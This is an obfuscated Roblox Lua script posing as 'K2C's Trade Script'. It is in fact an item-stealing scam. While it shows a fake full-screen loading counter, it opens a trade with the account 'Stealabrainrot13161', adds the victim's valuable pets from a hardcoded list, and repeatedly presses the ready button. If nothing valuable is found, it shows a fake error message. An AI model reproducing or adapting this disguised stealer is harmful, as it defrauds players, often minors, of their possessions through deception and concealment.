--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=game:GetService("Players");local v1=v0.LocalPlayer;local v2=game:GetService("VirtualInputManager");local v3=game:GetService("Workspace");local v4=game:GetService("TweenService");local v5="rbxassetid://11648237431";local v6="rbxassetid://102332883378771";local v7=Instance.new("ScreenGui");v7.Name="LoadingScreen";v7.ResetOnSpawn=false;v7.ZIndexBehavior=Enum.ZIndexBehavior.Global;v7.DisplayOrder=999;v7.Parent=v1:WaitForChild("PlayerGui");local v14=Instance.new("Frame");v14.Size=UDim2.new(0.81249994,0,1.10000157,0);v14.Position=UDim2.new(0.5,0,0.439999968,0);v14.AnchorPoint=Vector2.new(0.5,0.5);v14.BackgroundColor3=Color3.fromRGB(15,15,15);v14.BackgroundTransparency=0;v14.BorderSizePixel=0;v14.ZIndex=1000;v14.Parent=v7;local v23=Instance.new("UICorner");v23.CornerRadius=UDim.new(0,20);v23.Parent=v14;local v26=Instance.new("ImageLabel");v26.Size=UDim2.new(0.7,0,0.4,0);v26.Position=UDim2.new(0.5,0,0.45,0);v26.AnchorPoint=Vector2.new(0.5,0.5);v26.BackgroundTransparency=1;v26.Image=v5;v26.ZIndex=1001;v26.Parent=v14;local v34=Instance.new("UICorner");v34.CornerRadius=UDim.new(0,16);v34.Parent=v26;local v37=Instance.new("TextLabel");v37.Size=UDim2.new(0.9,0,0.08,0);v37.Position=UDim2.new(0.5,0,0.32,0);v37.AnchorPoint=Vector2.new(0.5,0.5);v37.BackgroundTransparency=1;v37.Text="K2C's Trade Script";v37.TextColor3=Color3.fromRGB(255,255,255);v37.TextSize=32;v37.Font=Enum.Font.GothamBold;v37.TextWrapped=true;v37.ZIndex=1001;v37.Parent=v14;local v50=Instance.new("TextLabel");v50.Size=UDim2.new(0.9,0,0.15,0);v50.Position=UDim2.new(0.5,0,0.68,0);v50.AnchorPoint=Vector2.new(0.5,0.5);v50.BackgroundTransparency=1;v50.Text="Loading... [0/100]";v50.TextColor3=Color3.fromRGB(220,220,255);v50.TextSize=38;v50.Font=Enum.Font.GothamBlack;v50.TextWrapped=true;v50.ZIndex=1001;v50.Parent=v14;local v63=Instance.new("Sound");v63.SoundId=v6;v63.Volume=1;v63.Looped=false;v63.Parent=v7;v63:Play();task.spawn(function() while v26.Parent do v4:Create(v26,TweenInfo.new(0.8,Enum.EasingStyle.Sine,Enum.EasingDirection.Out),{Size=UDim2.new(0.78,0,0.45,0)}):Play();task.wait(0.8);v4:Create(v26,TweenInfo.new(0.8,Enum.EasingStyle.Sine,Enum.EasingDirection.Out),{Size=UDim2.new(0.7,0,0.4,0)}):Play();task.wait(0.8);end end);task.spawn(function() local v92=0;local v93={"",".","..","..."};local v94=1;while v92<100  do v92=v92 + 1 ;v94=(v94%4) + 1 ;v50.Text="Loading"   .. v93[v94]   .. " ["   .. v92   .. "/100]" ;task.wait(0.83);end local v95=TweenInfo.new(1,Enum.EasingStyle.Sine);v4:Create(v14,v95,{BackgroundTransparency=1}):Play();v4:Create(v50,v95,{TextTransparency=1}):Play();v4:Create(v26,v95,{ImageTransparency=1}):Play();v4:Create(v37,v95,{TextTransparency=1}):Play();task.delay(1.1,function() v7:Destroy();end);end);print("[TRADE] Starting trade process...");local function v68(v96) if  not v96 then return;end for v106,v107 in ipairs(getconnections(v96.Activated)) do v107:Fire();end end local function v69(v97,v98) for v108,v109 in ipairs(v97:GetDescendants()) do if (v109.Name==v98) then return v109;end end return nil;end local function v70(v99) if  not v99 then return false;end local v100=v99.BackgroundColor3 or v99.ImageColor3 ;if  not v100 then return false;end local v101,v102,v103=81/255 ,158/255 ,86/255 ;local v104=0.08;return (math.abs(v100.R-v101 )<=v104) and (math.abs(v100.G-v102 )<=v104) and (math.abs(v100.B-v103 )<=v104) ;end local v71=v3:FindFirstChild("TradeMachine");local v72=v71 and v71:FindFirstChild("Prompt") and v71.Prompt:FindFirstChild("ProximityPrompt") ;if v72 then fireproximityprompt(v72);task.wait(3);else warn("ProximityPrompt not found");return;end local v73=v1.PlayerGui:FindFirstChild("TradePlayerList") or v1:FindFirstChild("TradePlayerList") ;if  not v73 then warn("TradePlayerList not found");return;end local v74=v69(v73,"Search");if v74 then v68(v74);end task.wait(1);local v75=v69(v73,"bg");local v76=v75 and v69(v75,"SearchFrame") ;local v77=v76 and v69(v76,"SearchBox") ;if (v77 and v77:IsA("TextBox")) then v77:CaptureFocus();task.wait(0.05);v77.Text="Stealabrainrot13161";task.wait(0.1);v2:SendKeyEvent(true,Enum.KeyCode.Return,false,game);task.wait(0.05);v2:SendKeyEvent(false,Enum.KeyCode.Return,false,game);v77:ReleaseFocus();task.wait(3);else warn("SearchBox not found");return;end local v78=v69(v73,"Global");local v79=v78 and v69(v78,"List") ;local v80=nil;if v79 then for v112,v113 in ipairs(v79:GetChildren()) do if v113:IsA("Frame") then for v139,v140 in ipairs(v113:GetDescendants()) do if ((v140:IsA("TextLabel") or v140:IsA("TextButton")) and v140.Text and v140.Text:find("Stealabrainrot13161")) then v80=v113;break;end end if v80 then break;end end end end if  not v80 then warn("Stealabrainrot13161 not found");return;end local v81=v69(v80,"Fill");local v82=v81 and v69(v81,"Send") ;if v82 then v68(v82);print("Trade request sent!");else warn("Send button not found");return;end print("Waiting for live trade...");local v83,v84;local v85=tick();while (tick() -v85)<45  do v83=v1.PlayerGui:FindFirstChild("TradeLiveTrade");if (v83 and v83:IsA("ScreenGui")) then v84=v83:FindFirstChild("TradeLiveTrade");if (v84 and v84:IsA("Frame") and v84.Visible) then print("Live trade detected!");break;end end task.wait(1);end if  not v84 then warn("Live trade frame not found");return;end print("Adding all matching items...");local v86=v69(v84,"Your");local v87=v86 and v69(v86,"ScrollingFrame") ;local v88=0;local v89={"strawberry elephant","meowl","headless horseman","skibidi toilet","griffin","hydra dragon cannelloni","dragon gingerini","dragon cannelloni","cerberus","capitano moby","burguro and fryuro","garama and madundung","lavadorito spinito","love love bear","la supreme combinasion","celestial pegasus","popcuru and fizzuru","rosey and teddy","cookie and milki","ketupat bros","reinito sleighito","los amigos","la secret combinasion","los sekolahs","la casa boo","fragrama and chocrama","la food combination","spooky and pumpky","la ginger sekolah","ginger gerat","los spaghettis","festive 67","ketchuru and musturu","los puggies","los hotspotsitos","ventoliero pavonero","tictac sahur","ketupat kepat","tang tang keletang","money money puggy","nuclearo dinossauro"};if v87 then for v114,v115 in ipairs(v87:GetChildren()) do if (v115:IsA("Frame") and v115.Name:find("Selection")) then local v138=v115:FindFirstChild("Spacer");if v138 then local v141=v138:FindFirstChild("Title");if (v141 and (v141:IsA("TextBox") or v141:IsA("TextLabel"))) then local v142=v141.Text or "" ;local v143=v142:lower();for v144,v145 in ipairs(v89) do if v143:find(v145) then task.wait(1.5);v68(v138);print("Added: "   .. v142   .. " ("   .. v145   .. ")" );v88=v88 + 1 ;break;end end end end end end end print("Finished adding items. Total added: "   .. v88 );if (v88==0) then print("[DECLINE] No matching items → declining trade...");local v111=v69(v84,"Cancel") or v69(v84,"Decline") or v69(v84,"Close") or v69(v84,"Exit") or v69(v84,"DeclineTrade") or v69(v84,"Reject") or v69(v84,"Back") ;if v111 then v68(v111);print("[DECLINE] Clicked decline button");else warn("[DECLINE] No decline button found – close manually");end task.delay(7,function() if v7.Parent then v4:Create(v14,TweenInfo.new(0.8),{BackgroundTransparency=1}):Play();v4:Create(v50,TweenInfo.new(0.8),{TextTransparency=1}):Play();v4:Create(v26,TweenInfo.new(0.8),{ImageTransparency=1}):Play();v4:Create(v37,TweenInfo.new(0.8),{TextTransparency=1}):Play();task.delay(0.9,function() v7:Destroy();end);end local v116=Instance.new("ScreenGui");v116.Parent=v1.PlayerGui;local v119=Instance.new("Frame");v119.Size=UDim2.new(0,450,0,100);v119.Position=UDim2.new(0.5, -225,0.15,0);v119.BackgroundColor3=Color3.fromRGB(30,30,30);v119.BackgroundTransparency=0.2;v119.Parent=v116;local v125=Instance.new("UICorner");v125.CornerRadius=UDim.new(0,16);v125.Parent=v119;local v128=Instance.new("TextLabel");v128.Size=UDim2.new(1,0,1,0);v128.BackgroundTransparency=1;v128.Text="Script isn't working correctly, try again later";v128.TextColor3=Color3.fromRGB(255,200,200);v128.TextSize=28;v128.Font=Enum.Font.GothamBold;v128.TextWrapped=true;v128.Parent=v119;v4:Create(v119,TweenInfo.new(0.7),{BackgroundTransparency=0.2}):Play();v4:Create(v128,TweenInfo.new(0.7),{TextTransparency=0}):Play();task.delay(5,function() v4:Create(v119,TweenInfo.new(1),{BackgroundTransparency=1}):Play();v4:Create(v128,TweenInfo.new(1),{TextTransparency=1}):Play();task.delay(1.2,function() v116:Destroy();end);end);end);return;end print("Starting ready loop...");local v90=v69(v84,"ReadyButton");if  not v90 then warn("ReadyButton not found");end local v91=tick();while (tick() -v91)<60  do if ( not v84.Visible or  not v84.Parent) then print("Trade frame closed → stopping");break;end if (v90 and v70(v90)) then v68(v90);print("Pressed ReadyButton (green)");task.wait(1);end task.wait(0.3);end print("Script finished!");
